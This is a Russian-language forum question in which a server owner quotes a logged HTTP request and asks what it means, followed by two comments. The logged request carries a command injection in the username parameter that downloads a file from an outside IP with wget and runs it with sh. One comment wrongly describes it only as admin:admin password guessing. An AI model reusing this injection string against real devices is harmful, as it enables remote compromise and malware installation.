# Что за странный запрос пришел ко мне на сервер?

Tags: linux, сервер, безопасность, get, request

Сегодня ранним утром мне на сервер прилетел вот такой чудесный запрос:

```
[pid: 1306|app: 0|req: 9/67] 125.164.123.216 () {32 vars in 923 bytes} [Tue Oct 30 06:15:28 2018] GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin => generated 233 bytes in 24 msecs (HTTP/1.1 404) 2 headers in 72 bytes (1 switches on core 0)
```

Firewall на этот момент был выключен.
Сервер на uwsgi, система Centos 7, если это важно.
Что вообще происходит в этом запросе? Майнер вроде не подцепил, CPU никто не жрёт.

Comment: Я видел у себя много странных запросов, таких, на которых можно методы взома изучать. И с sh-скриптами, и с sql-инжектами, и ещё много всякой фигни присылают, и не перестают слать. Может и мне на несколько страниц понапубликовать))))

Comment: @nick_n_a Ну в моём случае это похоже на попытку угадать пароль от админки admin:admin